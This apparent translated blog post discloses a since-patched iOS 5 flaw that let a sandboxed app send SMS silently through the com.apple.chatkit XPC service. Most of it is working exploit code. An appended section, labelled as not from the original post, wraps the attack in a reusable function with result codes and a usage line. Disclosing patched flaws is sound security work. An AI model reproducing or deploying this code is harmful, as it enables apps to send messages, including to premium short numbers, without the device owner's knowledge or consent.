Your flashlight can send SMS: another reason to upgrade your devices to iOS 6



    Today I will not describe how the iOS 5 security model works, and we will not be collecting crumbs of information through undocumented features. We will simply send an SMS from an application without the user knowing.



    There is very little information on the net describing the low-level internals of iOS, and the crumbs that exist do not let you reconstruct the whole picture. Many header files are backed by closed-source implementations, so most steps have to be taken almost blind. The main testbed for experimentation is therefore the "progenitor" of the mobile platform: Mac OS X.

    One of the interprocess communication mechanisms in Mac OS X is XPC. This layer is built for interprocess communication on top of plist-like structures, using libSystem and launchd. In practice it is an interface that lets processes control each other by exchanging dictionary structures. And, by inheritance, iOS 5 has the same mechanism.

    You have probably already guessed where this introduction is going. Yes, iOS has system services that expose XPC endpoints, and in my example I want to demonstrate how to talk to the daemon that sends SMS messages. First, though, one thing must be said up front: this hole is closed in iOS 6, but it is relevant for iOS 5.0-5.1.1. Using it does not require a jailbreak, private frameworks or any other means forbidden to App Store applications. All you need is the set of header files in the /usr/include/xpc/* directory on your Mac.

    In iOS, one of the components involved in sending SMS messages is the com.apple.chatkit system service, whose job is composing, managing and sending short text messages. For ease of management it exposes a public Mach service port, com.apple.chatkit.clientcomposeserver.xpc. Through the XPC subsystem, an application can compose and send messages without the user's confirmation.



    Well, let's try to create a connection.

    #include <xpc/xpc.h>
    #include <dispatch/dispatch.h>

    xpc_connection_t myconnection;
    // Queue on which the connection's event handler will run; the label is arbitrary.
    dispatch_queue_t queue = dispatch_queue_create("com.apple.chatkit.clientcomposeserver.xpc", DISPATCH_QUEUE_CONCURRENT);
    // Look up the daemon's Mach service by name and create a client connection to it.
    // The PRIVILEGED flag asks for the service in the system (launchd root) domain.
    myconnection = xpc_connection_create_mach_service("com.apple.chatkit.clientcomposeserver.xpc", queue, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
    


    We now have an XPC connection, myconnection, to the SMS-sending service. However, XPC is designed so that a connection is created in a suspended state: one more step is needed to activate it.

    // Every connection needs an event handler before it is resumed; it receives
    // both messages from the daemon and connection-level errors.
    xpc_connection_set_event_handler(myconnection, ^(xpc_object_t event) {
        xpc_type_t xtype = xpc_get_type(event);
        if (XPC_TYPE_ERROR == xtype) {
            // XPC_ERROR_CONNECTION_INVALID here means the service could not be
            // reached, or we were not allowed to reach it.
            NSLog(@"XPC sandbox connection error: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION));
        }
        NSLog(@"Received a message event!");
    });
    xpc_connection_resume(myconnection);
    


    We resume the connection. On iOS 6 this is the moment at which a message appears in the device console saying that this kind of interaction is prohibited. Next we need to build an xpc_dictionary with the data required to send the message.

    NSArray *recipients = [NSArray arrayWithObjects:@"+7 (90*) 000-00-00", nil];
    // The daemon expects the recipient list as a serialized binary property list,
    // not as an XPC array (the original used the raw value 200, which is
    // NSPropertyListBinaryFormat_v1_0).
    NSData *ser_rec = [NSPropertyListSerialization dataWithPropertyList:recipients format:NSPropertyListBinaryFormat_v1_0 options:0 error:NULL];
    xpc_object_t mydict = xpc_dictionary_create(NULL, NULL, 0);
    xpc_dictionary_set_int64(mydict, "message-type", 0);
    xpc_dictionary_set_data(mydict, "recipients", [ser_rec bytes], [ser_rec length]);
    xpc_dictionary_set_string(mydict, "text", "hello from your application!");
    


    Little remains: send the message to the XPC port and make sure it has gone out. Note that a barrier only tells you the message has left your process; it is not an acknowledgement from the daemon, and certainly not proof that the carrier delivered the SMS.

    xpc_connection_send_message(myconnection, mydict);
    // The barrier block runs once every message queued before it has been sent,
    // i.e. once the message has left this process.
    xpc_connection_send_barrier(myconnection, ^{
        NSLog(@"Message has been successfully delivered");
    });
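The steps above (create the connection, install the event handler, resume, build the dictionary, send, barrier) assembled into one function, as an added example that is not code from the original post. It returns a verdict the caller can act on instead of only logging. The function name sendSMSviaChatKit, the SMSSendResult enum and the placeholder phone number are mine; the service name and the dictionary keys "message-type", "recipients" and "text" are those given in the post. Two further assumptions: that a sandbox refusal (the iOS 6 behaviour) reaches the client as XPC_ERROR_CONNECTION_INVALID, and that the daemon's reply format is unknown, so "queued" means only that the message left our process.

```objective-c
#import <Foundation/Foundation.h>
#include <xpc/xpc.h>
#include <dispatch/dispatch.h>
#include <os/object.h>
#include <stdlib.h>

/* Added example, not the post's own code. Assumptions: a denied connection is
 * expected to surface as XPC_ERROR_CONNECTION_INVALID; the daemon's reply is
 * not interpretable, so kSMSQueued only means the message left this process. */
typedef enum {
    kSMSQueued  = 0,   /* message handed to the daemon, no error reported   */
    kSMSDenied  = 1,   /* connection invalid/interrupted: refused or daemon gone */
    kSMSTimeout = 2    /* neither a barrier nor an error arrived in time   */
} SMSSendResult;

static SMSSendResult sendSMSviaChatKit(NSString *recipient, NSString *text,
                                       NSTimeInterval timeout) {
    /* Serial queue: the event handler and the barrier block cannot race. */
    dispatch_queue_t queue = dispatch_queue_create("xpc.chatkit.client", DISPATCH_QUEUE_SERIAL);
    dispatch_semaphore_t done = dispatch_semaphore_create(0);
    __block SMSSendResult result = kSMSTimeout;
    __block BOOL finished = NO;   /* set once we stop caring about events */

    xpc_connection_t conn = xpc_connection_create_mach_service(
        "com.apple.chatkit.clientcomposeserver.xpc", queue,
        XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);

    xpc_connection_set_event_handler(conn, ^(xpc_object_t event) {
        if (finished) return;   /* ignore the INVALID event our own cancel produces */
        if (xpc_get_type(event) == XPC_TYPE_ERROR) {
            NSLog(@"XPC error: %s",
                  xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION));
            /* INVALID: lookup failed or the sandbox refused the connection.
             * INTERRUPTED: the daemon exited or was killed mid-conversation. */
            if (event == XPC_ERROR_CONNECTION_INVALID ||
                event == XPC_ERROR_CONNECTION_INTERRUPTED) {
                result = kSMSDenied;   /* an error always overrides "queued" */
                dispatch_semaphore_signal(done);
            }
            return;
        }
        /* Anything else is a message from the daemon; its layout is
         * undocumented, so just dump it for analysis. */
        char *desc = xpc_copy_description(event);
        NSLog(@"Event from daemon: %s", desc);
        free(desc);
    });
    xpc_connection_resume(conn);

    /* Recipients go in as a binary plist array of strings, not as an XPC array. */
    NSData *plist = [NSPropertyListSerialization
                        dataWithPropertyList:[NSArray arrayWithObject:recipient]
                                      format:NSPropertyListBinaryFormat_v1_0
                                     options:0
                                       error:NULL];
    xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);
    xpc_dictionary_set_int64(msg, "message-type", 0);
    xpc_dictionary_set_data(msg, "recipients", [plist bytes], [plist length]);
    xpc_dictionary_set_string(msg, "text", [text UTF8String]);

    xpc_connection_send_message(conn, msg);
    /* The barrier runs once every message queued before it has been sent:
     * proof the message left this process, not that the daemon accepted it. */
    xpc_connection_send_barrier(conn, ^{
        if (result == kSMSTimeout) {
            result = kSMSQueued;
        }
        dispatch_semaphore_signal(done);
    });

    dispatch_semaphore_wait(done, dispatch_time(DISPATCH_TIME_NOW,
                                                (int64_t)(timeout * NSEC_PER_SEC)));
    /* Drain the queue so an error delivered right after the barrier is seen,
     * and read the verdict on the same queue that writes it. */
    __block SMSSendResult verdict;
    dispatch_sync(queue, ^{ verdict = result; finished = YES; });

    xpc_connection_cancel(conn);
#if !OS_OBJECT_USE_OBJC   /* manual retain/release toolchains such as the iOS 5 SDK */
    xpc_release(msg);
    xpc_release(conn);
    dispatch_release(queue);
    dispatch_release(done);
#endif
    return verdict;
}
```

Call it as sendSMSviaChatKit(@"+7 (90*) 000-00-00", @"hello from your application!", 5.0) from the application. On iOS 5.0-5.1.1 the expectation is kSMSQueued; on iOS 6 the event handler should receive a connection error when the sandbox refuses the Mach lookup, giving kSMSDenied. The post's snippet uses a concurrent queue; a serial one is used here so that the barrier block and the error path never touch `result` at the same time.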
    


    (Screenshot: the SMS sent to a short number.)
    So, until this feature was removed in iOS 6, any application could send SMS messages without the user's knowledge. In iOS 6, Apple added an additional layer of security that does not allow a sandboxed application to connect to this service.

    Thanks for your attention!
